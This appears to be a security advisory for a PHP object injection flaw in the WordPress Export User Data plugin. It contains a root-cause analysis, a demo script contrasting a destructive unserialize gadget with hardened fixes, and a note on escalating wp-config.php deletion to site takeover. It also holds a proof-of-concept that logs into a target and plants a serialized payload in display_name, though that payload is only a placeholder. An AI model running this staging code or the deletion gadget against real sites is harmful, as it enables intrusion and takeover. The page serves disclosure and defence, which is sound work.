Published : June 29, 2026

CVE-2026-12240: Export User Data <= 2.2.6 Authenticated (Subscriber+) PHP Object Injection to Arbitrary File Deletion via display_name Field PoC, Patch Analysis & Rule

Severity: High (CVSS 8.0)
CWE: CWE-502
Vulnerable Version: <= 2.2.6
Patched Version:
Disclosed: June 28, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-12240 (metadata-based):
This vulnerability affects the Export User Data plugin for WordPress in all versions up to and including 2.2.6. It allows authenticated attackers with Subscriber-level access or higher to cause arbitrary file deletion through PHP object injection. The CVSS score is 8.0 (High).

The root cause is deserialization of untrusted data (CWE-502) combined with insufficient file path validation. The plugin's export functionality unserializes stored user data without checking what it contains, so a crafted PHP object can be injected. Specifically, a user stores a serialized payload referencing the XLSXWriter class (a PHP spreadsheet library) in their display_name field; when an administrator later triggers a user data export, the plugin unserializes that value, and the behaviour of the resulting object leads to deletion of an attacker-chosen file. Atomic Edge infers this from the CWE classification, the vulnerability description, and the mention of XLSXWriter. No source code is available to confirm the exact unserialize call, the gadget involved, or the missing path validation logic.

Exploitation requires two conditions: (1) a Subscriber-level (or higher) attacker stores a crafted serialized XLSXWriter object in their display_name field, and (2) an administrator triggers a user data export. The attacker registers an account or edits an existing profile and sets display_name to a serialized PHP object which, when unserialized, controls the path of the file to delete (e.g. wp-config.php). The export is most likely a WordPress admin page or admin-ajax.php action belonging to the plugin. Atomic Edge infers the attack vector from the description; no specific endpoint is confirmed without source code.

Remediation requires the developer to stop unserializing untrusted user input (display_name is user-controlled by design) and to validate any file path before it reaches a deletion function. If stored data must be decoded at all, unserialize() should be called with allowed_classes set to false, or the data should be stored as JSON instead, so that no object is ever instantiated from user input. Deletions should be confined to an allow-list of files, or resolved with PHP's realpath() and rejected unless the result lies inside the plugin's own export directory. Rejecting profile values that look like PHP-serialized data is a useful defence in depth, but it is not a substitute for removing the unserialize call.
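The following script is an added illustration written for this page, not code from the Export User Data plugin or from the XLSXWriter library. It shows the mechanics the root-cause analysis describes (a stored string that unserialize() turns into an object whose __destruct() deletes a file) next to the two fixes recommended above, plus the defence-in-depth input check. The class DemoTempFileCleaner, the function names, the 'pre_user_display_name' hook suggestion and the throwaway directory layout are hypothetical stand-ins; nothing here reproduces the real gadget, which this page does not have.

```php
<?php
// Added illustration for this page, not plugin or library code. DemoTempFileCleaner
// is a hypothetical gadget class: any class with a destructive __destruct() will do.
declare(strict_types=1);

final class DemoTempFileCleaner
{
    public string $path = '';

    // Runs when the object is garbage-collected, including objects unserialize() created.
    public function __destruct()
    {
        if ($this->path !== '' && is_file($this->path)) {
            @unlink($this->path);
        }
    }
}

// --- Vulnerable pattern (as the analysis infers for the plugin) ---------------------
function vulnerable_export(string $stored_display_name): void
{
    $value = unserialize($stored_display_name); // attacker's class is instantiated here
    unset($value);                              // ...and its __destruct() fires here
}

// --- Hardened pattern ---------------------------------------------------------------
// 1. Never instantiate classes from stored data. If the field must be decoded at all,
//    allowed_classes => false turns any object into __PHP_Incomplete_Class, which has
//    no destructor and no methods. A display name should simply be treated as text.
function hardened_export(string $stored_display_name): string
{
    $value = @unserialize($stored_display_name, ['allowed_classes' => false]);
    return is_string($value) ? $value : $stored_display_name;
}

// 2. Confine deletions to one directory: resolve both sides with realpath() and
//    require the target to sit below the base, so "../" and absolute paths are refused.
function safe_delete(string $base_dir, string $requested): bool
{
    $base = realpath($base_dir);
    $real = realpath($requested);
    if ($base === false || $real === false) {
        return false;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    return is_file($real) && unlink($real);
}

// 3. Defence in depth: a display name never legitimately starts like PHP serialized
//    data (O: object, C: custom object, a: array). A site could apply this check in a
//    'pre_user_display_name' filter; it complements, but does not replace, fix 1.
function looks_like_php_serialized(string $value): bool
{
    return (bool) preg_match('/^[OCa]:\d+:/', ltrim($value));
}

// --- Demo on a throwaway directory that imitates a site root ------------------------
$root = sys_get_temp_dir() . '/oi-demo-' . bin2hex(random_bytes(4));
mkdir("$root/exports", 0700, true);
$config = "$root/wp-config.php";
file_put_contents($config, "<?php // secrets\n");
file_put_contents("$root/exports/old.xlsx", "stale export");

// Constructed attacker value: built by hand so no gadget object exists in this process
// until unserialize() creates it. 19 is strlen('DemoTempFileCleaner').
$attacker_display_name = 'O:19:"DemoTempFileCleaner":1:{s:4:"path";s:'
    . strlen($config) . ':"' . $config . '";}';

vulnerable_export($attacker_display_name);
printf("vulnerable export: wp-config.php still present? %s\n", is_file($config) ? 'yes' : 'no');

file_put_contents($config, "<?php // secrets\n"); // restore for the second run
hardened_export($attacker_display_name);
printf("hardened export:   wp-config.php still present? %s\n", is_file($config) ? 'yes' : 'no');

printf("delete exports/old.xlsx:    %s\n", safe_delete("$root/exports", "$root/exports/old.xlsx") ? 'deleted' : 'refused');
printf("delete ../wp-config.php:    %s\n", safe_delete("$root/exports", "$root/exports/../wp-config.php") ? 'deleted' : 'refused');
printf("flag attacker display_name: %s\n", looks_like_php_serialized($attacker_display_name) ? 'flagged' : 'clean');
printf("flag 'Jane Doe':            %s\n", looks_like_php_serialized('Jane Doe') ? 'flagged' : 'clean');

// Cleanup of the throwaway directory.
array_map('unlink', array_filter([$config, "$root/exports/old.xlsx"], 'is_file'));
rmdir("$root/exports");
rmdir($root);
```

Run it with php on the command line: the vulnerable run loses wp-config.php, the hardened run keeps it, the confined delete accepts the in-tree file and refuses the traversal, and only the serialized-looking value is flagged. The point of ordering the fixes this way is that allowed_classes => false removes the gadget entirely, realpath() confinement limits the damage if some other deletion path is reachable, and the input check only catches the obvious payload shape.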

The impact is severe. Successful exploitation leads to arbitrary file deletion, including of critical files such as wp-config.php. Deleting wp-config.php is a known route to remote code execution (RCE): WordPress then presents its installation wizard to the next visitor, the attacker can complete it against a database they control, obtain an administrator account, and from there install a plugin containing arbitrary PHP. The vulnerability requires user interaction (an administrator running the export) and authenticated access, which limits its reach but still leaves it a high risk.

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-12240 - Export User Data <= 2.2.6 - PHP Object Injection to Arbitrary File Deletion

// This PoC assumes:
// - The attacker has subscriber-level credentials on the target site.
// - The plugin stores user display_name fields and later unserializes them during export.
// - The export is triggered by an administrator from the plugin's own admin page or
//   admin-ajax.php action; the exact endpoint is inferred from the plugin slug and is
//   not confirmed against source code.
// - The target file to delete is wp-config.php (common for RCE).
// - display_name is written through WordPress core's profile form (wp-admin/profile.php),
//   which any logged-in user can submit for their own account. Core passes the value
//   through sanitize_text_field(), which strips tags and stray whitespace but leaves a
//   serialized string such as O:10:"XLSXWriter":0:{} intact.

$target_url = 'http://example.com'; // Change this to the target WordPress URL
$username   = 'attacker';           // Subscriber-level account
$password   = 'attacker_password';
$cookie_jar = tempnam(sys_get_temp_dir(), 'wpcookie');

// Step 1: Craft a serialized PHP object payload for XLSXWriter that exploits file deletion.
// In a real exploit, this would be a class with a __destruct() or __wakeup() method whose
// properties carry the path to delete. Since no source code is available, a generic
// serialized object is used as a placeholder.
$payload = 'O:10:"XLSXWriter":0:{}'; // Placeholder - real payload would target file deletion.

// Helper: one HTTP request; cookies are persisted in $cookie_jar between calls.
function http_request(string $url, ?array $post_fields, string $cookie_jar): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR      => $cookie_jar,
        CURLOPT_COOKIEFILE     => $cookie_jar,
    ]);
    if ($post_fields !== null) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
    }
    $body = curl_exec($ch);
    if ($body === false) {
        fwrite(STDERR, 'curl error: ' . curl_error($ch) . "\n");
        exit(1);
    }
    curl_close($ch);
    return $body;
}

// Helper: pull the value attribute of a named <input> out of the profile form HTML.
function form_value(string $html, string $name): ?string
{
    $re = '/name="' . preg_quote($name, '/') . '"[^>]*\bvalue="([^"]*)"/';
    return preg_match($re, $html, $m) ? html_entity_decode($m[1], ENT_QUOTES) : null;
}

// Step 2: Log in to obtain the WordPress authentication cookies.
http_request($target_url . '/wp-login.php', [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
], $cookie_jar);

// Step 3: Load the attacker's own profile form. It carries the per-user nonce
// (nonce action "update-user_<id>") and the existing values core requires on resubmission.
$profile  = http_request($target_url . '/wp-admin/profile.php', null, $cookie_jar);
$nonce    = form_value($profile, '_wpnonce');
$user_id  = form_value($profile, 'user_id');
$email    = form_value($profile, 'email');
$nickname = form_value($profile, 'nickname');
if ($nonce === null || $user_id === null || $email === null) {
    fwrite(STDERR, "Profile form not found; login probably failed.\n");
    exit(1);
}

// Step 4: Resubmit the profile form with display_name set to the serialized payload.
// email and nickname are mandatory in edit_user(), so the current values are echoed back.
http_request($target_url . '/wp-admin/profile.php', [
    'action'           => 'update',
    'user_id'          => $user_id,
    '_wpnonce'         => $nonce,
    '_wp_http_referer' => '/wp-admin/profile.php',
    'email'            => $email,
    'nickname'         => $nickname ?? $username,
    'display_name'     => $payload,
], $cookie_jar);

// Step 5: Trigger export (requires admin action - this PoC only stages the payload).
// Successful exploitation requires an administrator to export user data.
unlink($cookie_jar);
echo "Payload stored. An administrator must now trigger the user data export to execute file deletion.\n";
